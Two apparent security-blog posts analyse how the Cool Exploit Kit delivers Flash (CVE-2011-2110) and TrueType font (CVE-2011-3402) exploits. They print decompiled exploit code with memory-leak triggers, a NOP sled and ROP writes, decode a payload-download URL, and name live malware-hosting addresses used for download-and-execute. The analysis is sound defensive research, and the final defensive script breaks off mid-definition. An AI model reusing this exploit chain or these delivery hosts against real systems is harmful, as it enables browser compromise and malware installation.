a bunch of random security bits! (blog by yomuds, http://www.blogger.com/profile/10660119780422829194)
Flash exploit (CVE-2011-2110) and Cool Exploit Kit (published 2012-11-30)<div dir="ltr" style="text-align: left;" trbidi="on">
The Cool Exploit Kit uses two Flash vulnerabilities in its exploit chain. This post analyzes the one for CVE-2011-2110, concentrating on how the attack is delivered through the Flash exploit rather than on the details of the vulnerability itself; ARTeam has a great writeup of CVE-2011-2110 <a href="http://www.accessroot.com/arteam/site/download.php?view.331" target="_blank">here</a>. As before, the starting point for this post is the index page of the Cool Exploit Kit.<br />
<br />
The JavaScript retrieved from the index page is shown below:<br />
<pre class="brush: js">// JS code from the index page. Only the code relevant to the Flash attack is shown.
// <snip>
function ShowPDF() {
    var pdf = (PluginDetect.getVersion("AdobeReader") + ".").toString().split(".");
    var vver = "";
    if (pdf[0] < 8) {
        vver = "old";
        setTimeout("FlashExploit()", 8003);
    } else if (pdf[0] == 8 || (pdf[0] == 9 && pdf[1] < 4)) {
        vver = "new";
        setTimeout("FlashExploit()", 7004);
    } else {
        // (a non-ASCII comment in the original, garbled in this copy)
        FlashExploit();
    }
    if (vver != "") {
        var d = document.createElement("div");
        d.innerHTML = '<iframe src="../media/pdf_' + vver + '.php"></iframe>';
        document.body.appendChild(d);
    }
}
function FlashExploit() {
    // $$ is presumably the kit's alias for the PluginDetect object (not shown in this excerpt)
    var ver = ($$.getVersion("Flash") + ".").toString().split(".");
    // First branch: Flash 10.0.x (x > 40), 10.1.x, or 10.2.x (x < 159) -> field.swf
    if (((ver[0] == 10 && ver[1] == 0 && ver[2] > 40) || ((ver[0] == 10 && ver[1] > 0) && (ver[0] == 10 && ver[1] < 2))) || ((ver[0] == 10 && ver[1] == 2 && ver[2] < 159) || (ver[0] == (11 - 1) && ver[1] < 2))) {
        var oSpan = document.createElement("span");
        document.body.appendChild(oSpan);
        oSpan.innerHTML = "<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'><param name='movie' value='../media/field.swf' /><param name='allowScriptAccess' value='always' /><param name='Play' value='0' /><embed src='../media/field.swf' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash' width='10' height='10'></embed></object>";
    // Second branch: Flash 10.3.181.0 - 10.3.181.23, or 10.3.x (x < 181) -> flash.swf?info=...
    } else if ((ver[0] == 10 && ver[1] == 3 && ver[2] == 181 && ver[3] <= 23) || (ver[0] == 10 && ver[1] == 3 && ver[2] < 181)) {
        var oSpan = document.createElement("span");
        document.body.appendChild(oSpan);
        var avmurl = "02e6b1525353caa8ad555330b65154b25550abb1b25633b6315350b7a93134ac55a835a951b252ca3556b1cf4f7e7a1c2075a8";
        oSpan.innerHTML = "<object classid='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000' id='asd' width='600' height='400' codebase='http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab'><param name='movie' value='../media/flash.swf?info=" + avmurl + "' /><embed src='../media/flash.swf?info=" + avmurl + "' name='asd' align='middle' allowNetworking='all' type='application/x-shockwave-flash' pluginspage='http://www.macromedia.com/go/getflashplayer'></embed></object>";
    }
}
// <snip>
</pre>
<br />
FlashExploit() is scheduled to run after the PDF-related attacks in ShowPDF() have been launched. The rest of this analysis concentrates on FlashExploit().<br />
<br />
Inspecting FlashExploit() shows that two different Flash files are prepared, and which one is loaded depends on the detected Flash Player version. This article analyzes the file loaded by the second branch, i.e. for versions lower than 10.3.181.24 (10.3.181.x with x up to 23) or any 10.3 build lower than 10.3.181.<br />
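To see which of the two SWFs a given Flash Player build would have been served, here is an added Python port of the two version predicates in FlashExploit() (my own code, not the kit's JavaScript; the function names are mine and the sample version strings are constructed):

```python
# Added example (my own Python, not the kit's JavaScript): a port of the two
# version predicates in FlashExploit() so an analyst can check which SWF a
# given Flash Player build would have been served.  Function names are mine;
# the version ranges are copied from the JavaScript above.

def parse_flash_version(ver_str):
    """Mimic `(ver + ".").toString().split(".")` and coerce each part to int.
    JavaScript compares the string parts numerically and an empty part
    coerces to 0, so missing components are treated as 0 here as well."""
    parts = (ver_str + ".").split(".")
    nums = [int(p) if p.isdigit() else 0 for p in parts]
    return (nums + [0, 0, 0, 0])[:4]


def select_swf(ver_str):
    """Return "field.swf", "flash.swf" or None for a Flash Player version."""
    v0, v1, v2, v3 = parse_flash_version(ver_str)
    # Branch 1, clause by clause as written in the kit:
    #   (10.0.x, x > 40) || (10.y, 0 < y < 2) || (10.2.x, x < 159) || (10.y, y < 2)
    # "(11 - 1)" is just 10, and the last clause already covers all of
    # 10.0.* and 10.1.*, so the first two clauses add nothing.
    branch1 = ((v0 == 10 and v1 == 0 and v2 > 40)
               or (v0 == 10 and 0 < v1 < 2)
               or (v0 == 10 and v1 == 2 and v2 < 159)
               or (v0 == 10 and v1 < 2))
    if branch1:
        return "field.swf"      # first <object>, no "info" parameter
    # Branch 2: 10.3.181.0 - 10.3.181.23, or any 10.3 build below 181.
    branch2 = ((v0 == 10 and v1 == 3 and v2 == 181 and v3 <= 23)
               or (v0 == 10 and v1 == 3 and v2 < 181))
    if branch2:
        return "flash.swf"      # second <object>, with ?info=<avmurl>
    return None                 # version not targeted by either branch


if __name__ == "__main__":
    # Constructed sample versions spanning both branches and the gaps between them.
    for ver in ["10.0.45.2", "10.2.152.26", "10.2.159.1",
                "10.3.181.23", "10.3.181.24", "11.5.502.110"]:
        print("%-14s -> %s" % (ver, select_swf(ver)))
```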
<br />
In the setup for loading that Flash file, one parameter, <span style="font-family: Courier New, Courier, monospace;">avmurl</span>, is initialized and assigned to:<br />
<br />
<pre class="brush: js">var avmurl = "02e6b1525353caa8ad555330b65154b25550abb1b25633b6315350b7a93134ac55a835a951b252ca3556b1cf4f7e7a1c2075a8";</pre>
Inspecting further, the Flash file located at ../media/flash.swf receives avmurl as its first parameter (named <span style="font-family: Courier New, Courier, monospace;">info</span> in the query string). Analysis of flash.swf is required to understand what it does with the <span style="font-family: Courier New, Courier, monospace;">info</span> parameter.
The partial AS3 code below belongs to flash.swf after decompilation:
<br />
<pre class="brush: as3">// <snip>
package
{
    public class Main extends flash.display.MovieClip
    {
        public function Main()
        {
            var i:uint = 0;
            var loader:URLLoader = null;
            var onLoadComplete:Function = null;
            var onLoadComplete:Function = function(arg0:flash.events.Event):void
            {
                var local1:*;
                content = loader.data;
                i = 0;
                while(i < content.length)
                {
                    content[i] = (content[i]) ^ 122; // XOR every downloaded byte with key 122
                    local1 = i + 1;
                    i = local1;
                }
                content.uncompress(); // zlib-decompress the XOR-ed data
                content_len = content.length;
                var local0:* = new ByteArray();
                code = local0;
                local0.position = 1024 * 1024;
                local0.writeInt(2053274210);
                local0.writeInt(2053339747);
                local0.writeInt(2053405283);
                local0.writeObject(local0);
                exploit(local0, local0);
                trace(local0.length);
            };
            var param:* = root.loaderInfo.parameters;
            var t_url:hexToBin = param[((('i') + ('n')) + ('f')) + ('o')]; // param["info"], hex-decoded
            while(i < t_url.length)
            {
                t_url[i] = (t_url[i]) ^ 122; // XOR every byte with key 122
                var i:uint = i + 1;
            }
            t_url.uncompress(); // zlib-decompress
// <snip>
</pre>
At line 35 of the snippet (the assignment to <span style="font-family: Courier New, Courier, monospace;">t_url</span>), the code retrieves the "info" parameter, which is the value passed in from the JavaScript above. The parameter is converted from hex to binary, every byte is XOR-ed with the key 122, and the result is decompressed (Flash uses the zlib library for ByteArray.uncompress()). Knowing these details, we can now inspect what the "info" parameter actually contains. Ruby was chosen to demonstrate the implementation (writing this in Ruby is much easier than setting up an AS3 development environment; if you already have one, just copy and paste the relevant code). Below is the Ruby code that reproduces the same logic:<br />
<br />
<pre class="brush: ruby"># Ruby code to mimic the AS3 handling of the "info" parameter:
# hex-decode, XOR every byte with 122, then zlib-inflate.
require 'zlib'

info = "02e6b1525353caa8ad555330b65154b25550abb1b25633b6315350b7a93134ac55a835a951b252ca3556b1cf4f7e7a1c2075a8"
# Use a binary (ASCII-8BIT) string so bytes >= 0x80 are appended as raw bytes
# rather than being UTF-8 encoded, which would corrupt the zlib stream.
data = "".force_encoding("BINARY")
info.scan(/../) { |a| data << (a.to_i(16) ^ 122) }
puts Zlib::Inflate.inflate(data)
</pre>
Run the code with:
<br />
<pre class="brush: bash">$ ruby infoswf.rb
http://transport.hitandrun.cc/r/f.php?avm=1
</pre>
<br />
The result of the "info" manipulation is a URL. That URL is used by the code as shown in the snippet below:<br />
<br />
<pre class="brush: as3">// <snip>
            {
                error_arr.uncompress();
            }
        }
    }
    var url_str:String = t_url;
    // The decoded "info" value becomes the download URL for the next stage
    var loader:URLLoader = new URLLoader();
    loader.dataFormat = URLLoaderDataFormat.BINARY;
    loader.addEventListener(Event.COMPLETE, onLoadComplete);
    loader.load(new URLRequest(t_url.toString()));
}
// <snip>
</pre>
Further analysis of the AS3 code reveals that the data served at that URL is shellcode XOR-ed with the key 122.
The AS3 snippet below shows the downloaded data being XOR-ed with 122 (and then uncompressed) in the onLoadComplete handler.
<br />
<pre class="brush: as3">// <snip>
public function Main() {
    var i: uint = 0;
    var loader: URLLoader = null;
    var onLoadComplete: Function = null;
    var onLoadComplete: Function = function (arg0: flash.events.Event): void {
        var local1: *;
        content = loader.data;
        i = 0;
        while (i < content.length) {
            content[i] = (content[i]) ^ 122; // XOR every downloaded byte with key 122
            local1 = i + 1;
            i = local1;
        }
        content.uncompress();
        content_len = content.length;
        var local0: * = new ByteArray();
        code = local0;
        local0.position = 1024 * 1024;
        local0.writeInt(2053274210);
        local0.writeInt(2053339747);
        local0.writeInt(2053405283);
        local0.writeObject(local0);
        exploit(local0, local0);
        trace(local0.length);
    };
// <snip>
</pre>
The AS3 snippet below is essentially the exploit code that triggers the CVE-2011-2110 vulnerability and sets up the NOP sled.
<br />
<pre class="brush: as3">// <snip>
public function exploit(): void {
    var uint1: uint = 0;
    var local2: * = this.code;
    // Trigger the 1st memory leak
    var number1: Number = new Number(parseFloat(String(local0[1073741841])));
    var local4: * = new ByteArray(); // the decompiler emitted "<dup>" here: the same fresh ByteArray, position 0
    local4.position = 0;
    local4.writeDouble(number1);
    var local5: * = ((((local4[0]) * 16777216) + ((local4[1]) * 65536)) + ((local4[2]) * 256)) + (local4[3]);
    this.baseaddr = local5;
    local2.position = 0;
    local2.endian = Endian.LITTLE_ENDIAN;
    local2.writeInt(((this.pobj - 1) + 16) + ((1024 * 4) * 100));
    local2.endian = Endian.BIG_ENDIAN;
    local2.writeUnsignedInt(1094861636);
    local2.writeUnsignedInt(1094861636);
    local2.writeUnsignedInt(1162233672);
    uint1 = 0;
    // setup NOP sled 41414141
    while (uint1 < 1024 * 100) {
        local2.writeUnsignedInt(1094795585);
        uint1 = uint1 + 1;
    }
    // <snip>
    // ROPing
    local2.endian = Endian.LITTLE_ENDIAN;
    local2.writeUnsignedInt(this.inc_eax_ret + 1);
    local2.endian = Endian.BIG_ENDIAN;
    local2.endian = Endian.LITTLE_ENDIAN;
    local2.writeUnsignedInt(this.inc_eax_ret + 1);
    local2.endian = Endian.BIG_ENDIAN;
    local2.endian = Endian.LITTLE_ENDIAN;
    local2.writeUnsignedInt(this.inc_eax_ret + 1);
    local2.endian = Endian.BIG_ENDIAN;
    local2.endian = Endian.LITTLE_ENDIAN;
    local2.writeUnsignedInt(this.inc_eax_ret + 1);
    local2.endian = Endian.BIG_ENDIAN;
    local2.endian = Endian.LITTLE_ENDIAN;
    local2.writeUnsignedInt(this.inc_eax_ret + 1);
    local2.endian = Endian.BIG_ENDIAN;
    local2.endian = Endian.LITTLE_ENDIAN;
    local2.writeUnsignedInt(this.inc_eax_ret + 1);
    local2.endian = Endian.BIG_ENDIAN;
    // <snip>
    // 9090 NOP sled
    local2.writeUnsignedInt(2425393296);
    local2.writeUnsignedInt(2425393296);
    local2.writeUnsignedInt(2425393296);
    local2.writeUnsignedInt(2425393296);
    local2.writeUnsignedInt(2425393296);
    local2.writeUnsignedInt(2425393296);
    local2.endian = Endian.BIG_ENDIAN;
    // write the data (XOR-ed with key 122) retrieved from the URL (info)
    local2.writeBytes(this.content, 0, this.content.length);
    // <snip>
    // Trigger another memory leak
    var number2: Number = new Number(parseFloat(String(local0[1073741741])));
    var local7: * = new ByteArray();
    // <snip>
</pre>
Inspecting the code further reveals a strong similarity to Metasploit's adobe_flashplayer_arrayindexing module.<br />
<br />
The next post will cover the malicious PDF or the other Flash vulnerability. </div>
CVE-2011-3402 and Cool Exploit Kit (published 2012-11-28)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
I have been working with the Cool Exploit Kit's payloads (attack vectors, rather) for the past few days. The attack vectors consist of multiple vectors such as Flash, Java, PDF, Font and . It is interesting to see how the exploit kit carries what are probably the latest publicly released exploits, plus a 0day for a Java vulnerability. The Cool Exploit Kit stands out from many other exploit kits because of that Java 0day (please read the awesome article by @kafeine on the Java 0day analysis <a href="http://malware.dontneedcoffee.com/2012/11/cool-ek-hello-my-friend-cve-2012-5067.html" target="_blank">here</a>). @kafeine also wrote a post on the Cool Exploit Kit's architecture <a href="http://malware.dontneedcoffee.com/2012/10/newcoolek.html" target="_blank">here</a>. So, I'll try to write multiple articles, concentrating only on the analysis of these particular vulnerabilities used within the exploit kit: CVE-2011-3402 for the TTF font, CVE-2010-0188 for LibTIFF in Adobe's PDF reader, and CVE-2011-2110 for AVM bytecode confusion in Adobe's Flash. In this post, I'll focus on CVE-2011-3402.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The analysis starts by inspecting the index file retrieved from the main page hosting the exploit kit. I'm using <a href="https://github.com/buffer/thug" target="_blank">Thug</a> (a honeyclient honeypot developed by Angelo 'buffer' Dell'Aera) to speed up my analysis (there is so much to do when it comes to de-obfuscating JavaScript ;P). Please refer to the Thug documentation on how to set it up and how to use it. Figure 1.0 below is a screenshot of the page-rendering result.</div>
<div style="text-align: justify;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhexoVENsr6-qz5_ouyiBrS3QG7keGGsUaabQPoFyE8CiBWw4KV-d0Pm49d20f6v51lH3rPZhtUJFPzFY7uQSWdITMsYZDzHvsw1cn93c5JoagkBONiMD-rKJ2HJ2VJASguJM0l/s1600/cve_2011-3402_5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhexoVENsr6-qz5_ouyiBrS3QG7keGGsUaabQPoFyE8CiBWw4KV-d0Pm49d20f6v51lH3rPZhtUJFPzFY7uQSWdITMsYZDzHvsw1cn93c5JoagkBONiMD-rKJ2HJ2VJASguJM0l/s400/cve_2011-3402_5.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: center;">
Figure 1.0: Result from Thug showing the @font-face setup pointing to the font file at ../32size_font.eot, which is later applied through the "duqu" CSS style</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The interesting part of Figure 1.0 is the word "duqu". IE's @font-face fetches a remote font specified by the "src:url" parameter, which points to ../32size_font.eot. A CSS style for that font-face, using the font from ../32size_font.eot, is then set as "duqu". 
The "duqu" style is important to understand because, in order to trigger the vulnerability in the font system, the font needs to be used by the browser, which in turn calls the font engine (Win32k). Figure 1.0 [3] shows how the duqu style is rendered. Wasn't it cute when the smiley characters ":)" showed up in our browser? I'll explain this later.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The next step of the analysis is to download 32size_font.eot for further inspection. The URL for 32size_font.eot is http://hosted_ip/r/32size_font.eot. In one of my analyses, I downloaded it via the URL http://transport.hitandrun.cc/r/32size_font.eot. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The Embedded OpenType File Format (EOT) was developed by Microsoft to enable TrueType and OpenType fonts to be linked to web pages and downloaded so the page can be rendered with that font. Understanding the EOT format is crucial in order to reconstruct the original font; please read Microsoft's EOT specification <a href="http://www.w3.org/Submission/EOT/" target="_blank">here</a>. The EOT is a mere container that lets the TTF font be loaded into the application (in this case a browser), thus triggering the vulnerability inside the TTF font rendering system (Win32k). Figure 2.0 shows basic information about the downloaded file. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQXfjEtQyuWZ5_itJp-zEOHAdhIHN20R4p9Btu1MwDbftwe3_nN_vecK02t93hyHW2_PiiaH6neMcJMvuDfNaa5DzV2tcMGcZpYcG7daQyeR4zjWOHpacfuxm4UjwM95FShcyT/s1600/cve_2011-3402_7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="207" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQXfjEtQyuWZ5_itJp-zEOHAdhIHN20R4p9Btu1MwDbftwe3_nN_vecK02t93hyHW2_PiiaH6neMcJMvuDfNaa5DzV2tcMGcZpYcG7daQyeR4zjWOHpacfuxm4UjwM95FShcyT/s320/cve_2011-3402_7.png" width="320" /></a></div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: justify;">Figure 2.0: Basic information for 32size_font.eot</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: justify;"><br /></span></div>
<div class="separator" style="clear: both; text-align: justify;">
The FullName and FamilyName of the font sound familiar: Symantec's report on Duqu pointed out that the font used within the Duqu attack is called Dexter. The FontDataSize value is 4004 bytes, which is the size of the embedded font. Based on the Figure 2.0 result, I was a bit curious about the "Flags" field reporting "not-compressed": when checking the embedded font data, I failed to recognize any TTF metadata. So I decided to write a new EOT file parser. Figure 3.0 shows the result of my EOT parser. </div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgowCewedBDC2IHf-BmlhDgJKArrgTsScGJh6KWxb7hEIZc6TEcLjvHAILbPQcRxZbPq2QM-zX4XA0b-2mEO-BxCxshNP9B1Q2fpIM7dt1JHNgagXtyBqBRTMDjTRozo6YLk5B3/s1600/cve_2011-3402_9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgowCewedBDC2IHf-BmlhDgJKArrgTsScGJh6KWxb7hEIZc6TEcLjvHAILbPQcRxZbPq2QM-zX4XA0b-2mEO-BxCxshNP9B1Q2fpIM7dt1JHNgagXtyBqBRTMDjTRozo6YLk5B3/s320/cve_2011-3402_9.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: justify;">Figure 3.0: Result from the new EOT parser</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: justify;"><br /></span></div>
<div class="separator" style="clear: both; text-align: justify;">
The new parser reads the metadata of the EOT file and dumps the embedded font into a new file, in this case named Dexter. As for the flags, it shows a different result: "tt_compressed" instead of "not_compressed", meaning the embedded TTF font is compressed. According to Microsoft's EOT specification, the compression algorithm used is the MicroType® Express algorithm. Based on this information, the Dexter file has to be decompressed to retrieve the uncompressed TTF font. Once the Dexter file is uncompressed, the TTF metadata can be displayed, as shown in Figure 4.0. </div>
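The header fields that such a parser reads, as an added example that is not the author's parser: a minimal Python reader for the EOT container (field layout per the W3C EOT submission linked above) that reports FamilyName, FullName, FontDataSize and the decoded Flags, slices out the embedded font data, and checks whether that data already looks like an sfnt/TTF. build_sample_eot() constructs synthetic test files in memory and is not the real 32size_font.eot; the parser does not implement MicroType Express decompression, it only reports that the TTEMBED_TTCOMPRESSED flag is set.

```python
import struct

# Flag bits and constants from the EOT specification (W3C submission).
TTEMBED_SUBSET = 0x00000001
TTEMBED_TTCOMPRESSED = 0x00000004    # FontData is MicroType Express compressed
TTEMBED_XORENCRYPTDATA = 0x10000000  # FontData is XOR-ed with 0x50
FLAG_NAMES = {
    TTEMBED_SUBSET: "TTEMBED_SUBSET",
    TTEMBED_TTCOMPRESSED: "TTEMBED_TTCOMPRESSED",
    TTEMBED_XORENCRYPTDATA: "TTEMBED_XORENCRYPTDATA",
}
EOT_MAGIC = 0x504C
EOT_VERSIONS = (0x00010000, 0x00020001, 0x00020002)
SFNT_TAGS = (b"\x00\x01\x00\x00", b"true", b"OTTO")  # TrueType/OpenType headers

# Fixed 82-byte prefix: EOTSize, FontDataSize, Version, Flags, FontPANOSE[10],
# Charset, Italic, Weight, fsType, MagicNumber, UnicodeRange1-4,
# CodePageRange1-2, CheckSumAdjustment, Reserved1-4, Padding1 (little-endian).
_FIXED = struct.Struct("<IIII10sBBIHH4I2II4IH")


def _read_utf16_field(buf, off):
    """Read one 'unsigned short Size' + UTF-16LE string pair starting at off."""
    (size,) = struct.unpack_from("<H", buf, off)
    off += 2
    if off + size > len(buf):
        raise ValueError("name field runs past the end of the file")
    return buf[off:off + size].decode("utf-16-le", errors="replace"), off + size


def parse_eot(buf):
    """Parse an EOT header and return the fields useful for font triage."""
    if len(buf) < _FIXED.size:
        raise ValueError("too short to be an EOT file")
    f = _FIXED.unpack_from(buf, 0)
    eot_size, font_data_size, version, flags, magic = f[0], f[1], f[2], f[3], f[9]
    if magic != EOT_MAGIC:
        raise ValueError("bad MagicNumber 0x%04X" % magic)
    if version not in EOT_VERSIONS:
        raise ValueError("unknown EOT version 0x%08X" % version)
    if eot_size > len(buf) or font_data_size > eot_size - _FIXED.size:
        raise ValueError("EOTSize/FontDataSize do not fit the data")
    off = _FIXED.size
    family, off = _read_utf16_field(buf, off)
    off += 2  # Padding2
    style, off = _read_utf16_field(buf, off)
    off += 2  # Padding3
    version_name, off = _read_utf16_field(buf, off)
    off += 2  # Padding4
    full, off = _read_utf16_field(buf, off)
    # FontData is the last field in every EOT version, so slice it from the
    # end rather than walking the version-specific fields (RootString, EUDC).
    font_data = bytes(buf[eot_size - font_data_size:eot_size])
    if flags & TTEMBED_XORENCRYPTDATA:
        font_data = bytes(b ^ 0x50 for b in font_data)
    return {
        "version": version,
        "flags": flags,
        "flag_names": [name for bit, name in FLAG_NAMES.items() if flags & bit],
        "family_name": family,
        "style_name": style,
        "version_name": version_name,
        "full_name": full,
        "font_data_size": font_data_size,
        "font_data": font_data,
        # False for a TTCOMPRESSED font until MicroType Express is undone,
        # which is exactly the "no TTF metadata" symptom described above.
        "looks_like_sfnt": font_data[:4] in SFNT_TAGS,
    }


def build_sample_eot(font_data, flags=0, family="Dexter", full="Dexter"):
    """Constructed sample: wrap font_data in a version 0x00020001 EOT header.
    Synthetic test data only, not the real 32size_font.eot."""
    def field(text):
        enc = text.encode("utf-16-le")
        return struct.pack("<H", len(enc)) + enc
    pad = b"\x00\x00"
    if flags & TTEMBED_XORENCRYPTDATA:
        font_data = bytes(b ^ 0x50 for b in font_data)
    body = (field(family) + pad + field("Regular") + pad + field("1.0") + pad
            + field(full) + pad + field("") + font_data)  # Padding5, RootString
    head = _FIXED.pack(0, len(font_data), 0x00020001, flags, b"\x00" * 10,
                       1, 0, 400, 0, EOT_MAGIC, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
    eot_size = len(head) + len(body)
    return struct.pack("<I", eot_size) + head[4:] + body


if __name__ == "__main__":
    sample = build_sample_eot(b"MTX-compressed-bytes" + b"\x00" * 44,
                              flags=TTEMBED_TTCOMPRESSED)
    info = parse_eot(sample)
    print(info["family_name"], info["full_name"], info["font_data_size"],
          info["flag_names"], info["looks_like_sfnt"])
```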
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCuEbKXYkQbI9YcRm7QPd6kIojOGsjk8skwRIXDqLOvS8qLOOAyvIa4xQxg16uIir4_LrRhj3YajwuEOdQ6-FRUZ5B4qeXD3lILGwBDx7saSg8ai5NPIyv6pRiAppRF9SQjGwo/s1600/cve_2011-3402_10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCuEbKXYkQbI9YcRm7QPd6kIojOGsjk8skwRIXDqLOvS8qLOOAyvIa4xQxg16uIir4_LrRhj3YajwuEOdQ6-FRUZ5B4qeXD3lILGwBDx7saSg8ai5NPIyv6pRiAppRF9SQjGwo/s320/cve_2011-3402_10.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div style="text-align: center;">
Figure 4.0: <span style="text-align: justify;">TTF metadata</span></div>
<br />
The next step is to analyze the Dexter TTF font. Good documentation on CVE-2011-3402 and its exploitation possibilities is given in great detail in the BlackHat Europe 2012 presentation by Lee Ling Chuan (aka lclee_vx), whose slides can be downloaded from <a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-Slides.pdf" target="_blank">here</a> and the accompanying white paper from <a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank">here</a>.<br />
<br />
To make the TTF file format easier to understand, 010 Editor's TTF font template is used. Figure 5.0 shows the TTF font format inside 010 Editor.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRfyfrAdp1ymJ1iS6jR8iUkJAjFF-b_QdHYIENseqEi2qvEnJGvZGjF0Jk1tKrnGVA0kbShO1EP6wPk6ThtR7SAZShxx2AUs5PyqRZn4tD5VvEz1pbRKe-FHgKeF2ie9n8tWud/s1600/cve_2011-3402_11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="273" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRfyfrAdp1ymJ1iS6jR8iUkJAjFF-b_QdHYIENseqEi2qvEnJGvZGjF0Jk1tKrnGVA0kbShO1EP6wPk6ThtR7SAZShxx2AUs5PyqRZn4tD5VvEz1pbRKe-FHgKeF2ie9n8tWud/s320/cve_2011-3402_11.png" width="320" /></a></div>
<br />
<div style="text-align: center;">
<span style="text-align: justify;">Figure 5.0: The TTF font format inside 010 Editor.</span></div>
<br />
Based on lclee_vx's presentation, the criteria to trigger the exploit are pretty much the same as in the extracted Dexter TTF font. Upon checking further, the shellcode can be found in the FPGM table. Two shellcodes are used, one for ring 0 and another for ring 3. The ring 0 shellcode copies and executes the ring 3 shellcode. The ring 3 shellcode downloads and executes (download and exec) a binary from this URL: http://146.185.235.21/r/f.php?k=4. Figures 6.0 and 7.0 show part of the ring 0 and ring 3 shellcode, respectively.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG0qDgGv8_jslWOqupw8hCre5zvFajdt8kI4JEuqOoCoCrSF3Rm_CgT8bmDsEuH9NA4FwCucw4iEeJ0chHUNnbfVFeiK_D8qgSDHftThexaKf1olUBNe97no9Ot_tj6I1Upqc7/s1600/cve_2011-3402_18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG0qDgGv8_jslWOqupw8hCre5zvFajdt8kI4JEuqOoCoCrSF3Rm_CgT8bmDsEuH9NA4FwCucw4iEeJ0chHUNnbfVFeiK_D8qgSDHftThexaKf1olUBNe97no9Ot_tj6I1Upqc7/s1600/cve_2011-3402_18.png" /></a></div>
<br />
<div style="text-align: center;">
Figure 6.0: Ring 0 (kernel) shellcode</div>
<div style="text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfOz_CRbHu1tr4VfPVvoiUN8DJO0bAXc292QjKG-6KD5NwOri7PujtzOxQs4bHDMVekJ5nTBt0m4t06Nq8VSXyHY5X5unHqLgQUzq4yPCgGTvVRuMv9tn1ELAw2LnVEU06JD3Q/s1600/cve_2011-3402_17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="348" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfOz_CRbHu1tr4VfPVvoiUN8DJO0bAXc292QjKG-6KD5NwOri7PujtzOxQs4bHDMVekJ5nTBt0m4t06Nq8VSXyHY5X5unHqLgQUzq4yPCgGTvVRuMv9tn1ELAw2LnVEU06JD3Q/s400/cve_2011-3402_17.png" width="400" /></a></div>
<br />
<div style="text-align: center;">
</div>
<div style="text-align: center;">
Figure 7.0: Ring 3 (userland) shellcode</div>
<div>
<br /></div>
<div style="text-align: center;">
<br /></div>
If we check carefully, the only characters supported by the Dexter TTF font are the smiley chars ":)". So, in order to trigger the vulnerability, the smiley chars are placed inside &lt;div class=duqu&gt;:)&lt;/div&gt;. Please refer back to Figure 1.0.<br />
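A defender-side check for the FPGM observation above, as an added example that is not code from this post or from 010 Editor: it parses the sfnt table directory, walks the fpgm instruction stream while skipping PUSH payloads, and flags a font program that executes instructions outside FDEF/ENDF blocks or carries a URL-like string. A legitimate fpgm is almost entirely function definitions, so either condition is a strong signal that the table holds something other than hinting code. The two fonts, the <code>example.invalid</code> URL and the size threshold are constructed assumptions, not data from the Dexter sample.

```python
import re
import struct
from typing import Dict, List, Tuple

# TrueType instruction opcodes used by the walker (from the TrueType spec).
NPUSHB, NPUSHW = 0x40, 0x41          # count byte, then count bytes / count words
PUSHB0, PUSHB7 = 0xB0, 0xB7          # PUSHB[n]: n+1 bytes follow
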